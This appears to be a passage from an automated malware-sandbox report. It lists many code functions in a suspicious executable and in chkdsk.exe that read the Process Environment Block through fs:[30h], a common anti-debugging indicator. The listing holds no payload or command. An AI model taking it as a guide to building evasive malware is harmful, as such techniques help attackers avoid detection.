      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E433540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E43A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4441E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E468DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05513D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05487D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054EA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05518DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054935A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055305AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055305AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055214FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h]
